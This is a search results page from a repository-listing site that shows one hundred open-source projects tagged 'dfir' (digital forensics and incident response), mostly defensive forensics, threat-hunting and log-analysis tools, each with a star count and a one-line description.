Awesome Open Source
Search
Programming Languages
Languages
All Categories
Categories
About
Search results for dfir
dfir
x
308 search results found
H4cker
⭐
15,693
This repository is primarily maintained by Omar Santos (@santosomar) and includes thousands of resources related to ethical hacking, bug bounties, digital forensics and incident response (DFIR), artificial intelligence security, vulnerability research, exploit development, reverse engineering, and more.
My Arsenal Of Aws Security Tools
⭐
8,549
List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc.
Awesome Incident Response
⭐
6,852
A curated list of tools for incident response
Lolbas
⭐
6,294
Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts)
Zeek
⭐
5,731
Zeek is a powerful network analysis framework that is much different from the typical IDS you may know.
Detectionlab
⭐
4,486
Automate the creation of a lab environment complete with security tooling and logging best practices
Threathunter Playbook
⭐
3,826
A community-driven, open-source project to share detection logic, adversary tradecraft and resources to make detection development more efficient.
Awesome Forensics
⭐
3,575
A curated list of awesome forensic analysis tools and resources
Thehive
⭐
3,216
TheHive: a Scalable, Open Source and Free Security Incident Response Platform
Intelowl
⭐
3,108
IntelOwl: manage your Threat Intelligence at scale
Loki
⭐
3,106
Loki - Simple IOC and YARA Scanner
Logontracer
⭐
2,619
Investigate malicious Windows logon by visualizing and analyzing Windows event log
Chainsaw
⭐
2,519
Rapidly Search and Hunt through Windows Forensic Artefacts
Timesketch
⭐
2,435
Collaborative forensic timeline analysis
Sysmon Modular
⭐
2,364
A repository of sysmon configuration modules
Signature Base
⭐
2,187
YARA signature and IOC database for my scanners and tools
Evtx Attack Samples
⭐
2,124
Windows Events Attack Samples
Cyberchef Recipes
⭐
1,920
A list of cyber-chef recipes and curated links
Hayabusa
⭐
1,800
Hayabusa (隼) is a sigma-based threat hunting and fast forensics timeline generator for Windows event logs.
Data
⭐
1,585
APTnotes data
Lolbas
⭐
1,572
Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts)
Yeti
⭐
1,568
Your Everyday Threat Intelligence
Malice
⭐
1,429
VirusTotal Wanna Be - Now with 100% more Hipster
Blue Team Notes
⭐
1,344
You didn't think I'd go and leave the blue team out, right?
Matano
⭐
1,259
Open source security data lake for threat hunting, detection & response, and cybersecurity analytics at petabyte scale on AWS
Cortex
⭐
1,237
Cortex: a Powerful Observable Analysis and Active Response Engine
Digital Forensics Guide
⭐
1,232
Digital Forensics Guide. Learn all about Digital Forensics, Computer Forensics, Mobile device Forensics, Network Forensics, and Database Forensics.
Beagle
⭐
1,171
Beagle is an incident response and digital forensics tool which transforms security logs and data into graphs.
Threathunting
⭐
1,088
A Splunk app mapped to MITRE ATT&CK to guide your threat hunts
Chirp
⭐
977
A DFIR tool written in Python.
Malcom
⭐
957
Malcom - Malware Communications Analyzer
Hindsight
⭐
925
Web browser forensics for Google Chrome/Chromium
Whids
⭐
921
Open Source EDR for Windows
Hunting Queries Detection Rules
⭐
865
KQL Queries. Defender For Endpoint and Azure Sentinel Hunting and Detection Queries in KQL. Out of the box KQL queries for: Advanced Hunting, Custom Detection, Analytics Rules & Hunting Rules.
Dissect
⭐
797
Dissect is a digital forensics & incident response framework and toolset that allows you to quickly access and analyse forensic artefacts from various disk and file formats, developed by Fox-IT (part of NCC Group).
Cyberthreathunting
⭐
755
A collection of resources for Threat Hunters - Sponsored by Falcon Guard
Threatingestor
⭐
730
Extract and aggregate threat intelligence.
Turbinia
⭐
689
Automation and Scaling of Digital Forensics Tools
Memlabs
⭐
689
Educational, CTF-styled labs for individuals interested in Memory Forensics
Kuiper
⭐
688
Digital Forensics Investigation Platform
Osx Security Awesome
⭐
687
A collection of OSX and iOS security resources
Forensicstools
⭐
682
A list of free and open forensics analysis tools and other resources
Mac_apt
⭐
675
macOS (& ios) Artifact Parsing Tool
Diffy
⭐
635
⛔ (DEPRECATED) Diffy is a triage tool used during cloud-centric security incidents, to help digital forensics and incident response (DFIR) teams quickly identify suspicious hosts on which to focus their response.
Lookyloo
⭐
627
Lookyloo is a web interface that allows users to capture a website page and then display a tree of domains that call each other.
Azurehunter
⭐
626
A Cloud Forensics Powershell module to run threat hunting playbooks on data from Azure and O365
Linuxforensics
⭐
611
Everything related to Linux Forensics
Ileapp
⭐
586
iOS Logs, Events, And Plist Parser
Uac
⭐
550
UAC is a Live Response collection script for Incident Response that makes use of native binaries and tools to automate the collection of AIX, Android, ESXi, FreeBSD, Linux, macOS, NetBSD, NetScaler, OpenBSD and Solaris systems artifacts.
Sysmon Config
⭐
529
Advanced Sysmon configuration, Installer & Auto Updater with high-quality event tracing
Awesome Event Ids
⭐
515
Collection of Event ID ressources useful for Digital Forensics and Incident Response
Threat Hunting And Detection
⭐
509
Repository for threat hunting and detection queries, etc. for Defender for Endpoint and Microsoft Sentinel in KQL(Kusto Query Language).
Dfirartifactmuseum
⭐
506
The goal of this repo is to archive artifacts from all versions of various OS's and categorizing them by type. This will help with artifact validation processes as well as increase access to artifacts that may no longer be readily available anymore.
Recuperabit
⭐
499
A tool for forensic file system reconstruction.
Wela
⭐
494
WELA (Windows Event Log Analyzer): The Swiss Army knife for Windows Event Logs! ゑ羅(ウェラ)
Iocextract
⭐
484
Defanged Indicator of Compromise (IOC) Extractor.
Dfirtrack
⭐
464
DFIRTrack - The Incident Response Tracking Application
Purplecloud
⭐
461
A little tool to play with Azure Identity - Azure Active Directory lab creation tool
Misp Warninglists
⭐
437
Warning lists to inform users of MISP about potential false-positives or other information in indicators
Cloud Forensics Utils
⭐
418
Python library to carry out DFIR analysis on the Cloud
Aleapp
⭐
405
Android Logs Events And Protobuf Parser
Cortex Analyzers
⭐
400
Cortex Analyzers Repository
Adtimeline
⭐
398
Timeline of Active Directory changes with replication metadata
Atc React
⭐
392
A knowledge base of actionable Incident Response techniques
Dfirmindmaps
⭐
381
A repository of DFIR-related Mind Maps geared towards the visual learners!
Swap_digger
⭐
376
swap_digger is a tool used to automate Linux swap analysis during post-exploitation or forensics. It automates swap extraction and searches for Linux user credentials, web forms credentials, web forms emails, http basic authentication, Wifi SSID and keys, etc.
Loobins
⭐
366
Living Off the Orchard: macOS Binaries (LOOBins) is designed to provide detailed information on various built-in "living off the land" macOS binaries and how they can be used by threat actors for malicious purposes.
Memprocfs Analyzer
⭐
358
MemProcFS-Analyzer - Automated Forensic Analysis of Windows Memory Dumps for DFIR
Enablewindowslogsettings
⭐
343
Documentation and scripts to properly enable Windows event logs.
Dfir Orc
⭐
343
Forensics artefact collection tool for systems running Microsoft Windows
Ir Rescue
⭐
309
A Windows Batch script and a Unix Bash script to comprehensively collect host forensic data during incident response.
Detectionlabelk
⭐
299
DetectionLabELK is a fork from DetectionLab with ELK stack instead of Splunk.
Attackdatamap
⭐
279
A datasource assessment on an event level to show potential coverage or the MITRE ATT&CK framework
Forensictools
⭐
270
Collection of forensic tools
Threathunting Keywords
⭐
252
Awesome list of keywords for Threat Hunting sessions
Sharphide
⭐
251
Tool to create hidden registry keys.
Pockint
⭐
251
A portable OSINT Swiss Army Knife for DFIR/OSINT professionals 🕵️ 🕵️ 🕵️
Malwless
⭐
244
Test Blue Team detections without running any attack.
Masterparser
⭐
238
MasterParser is a powerful DFIR tool designed for analyzing and parsing Linux logs
Catalyst
⭐
237
Catalyst is an open source SOAR and ticket system that helps to automate alert handling and incident response processes
Threatpinchlookup
⭐
236
Documentation and Sharing Repository for ThreatPinch Lookup Chrome & Firefox Extension
Trawler
⭐
224
PowerShell script to help Incident Responders discover potential adversary persistence mechanisms.
Dfir Toolkit
⭐
222
CLI tools for forensic investigation of Windows artifacts
Userline
⭐
217
Query and report user logons relations from MS Windows Security Events
Dfir O365rc
⭐
214
PowerShell module for Office 365 and Azure log collection
Varc
⭐
210
Volatile Artifact Collector collects a snapshot of volatile data from a system. It tells you what is happening on a system, and is of particular use when investigating a security incident.
Lecmd
⭐
205
Lnk Explorer Command line edition!!
Thehive4py
⭐
201
Python API Client for TheHive
Collect Memorydump
⭐
186
Collect-MemoryDump - Automated Creation of Windows Memory Snapshots for DFIR
Mde Dfir Resources
⭐
184
A curated list of resources for DFIR through Microsoft Defender for Endpoint leveraging kusto queries, powershell scripts, tools such as KAPE and THOR Cloud and more.
Pypowershellxray
⭐
184
Python script to decode common encoded PowerShell scripts
Artifactcollector
⭐
184
🚨 The artifactcollector is a customizable agent to collect forensic artifacts on any Windows, macOS or Linux system
Emailanalyzer
⭐
183
With EmailAnalyzer you can analyze your suspicious emails. You can extract headers, links, and hashes from the .eml file and you can generate reports.
Thehitchhikersguidetodfirexperiencesfrombeginnersandexperts
⭐
176
The official repo for a project involving a crowdsourced DFIR book. The main purpose of this book is to give anyone interested an opportunity to write a chapter of a book to get their name out there, get a publication on their resume with an actual ISBN number, and ideally lower the bar for people to contribute something back to the DFIR Community. Want to write a chapter? Let me know and let's make it happen!
Mindmaps
⭐
172
#ThreatHunting #DFIR #Malware #Detection Mind Maps
Fennec
⭐
170
Artifact collection tool for *nix systems
Regrippy
⭐
166
A modern Python-3-based alternative to RegRipper
Dfir_ntfs
⭐
166
An NTFS/FAT parser for digital forensics & incident response
Pecmd
⭐
156
Prefetch Explorer Command Line
Cve 2020 0796 Lpe Poc
⭐
155
CVE-2020-0796 Local Privilege Escalation POC
1-100 of 308 search results
Next >
Privacy
|
About
|
Terms
|
Follow Us On Twitter
Copyright 2018-2024 Awesome Open Source. All rights reserved.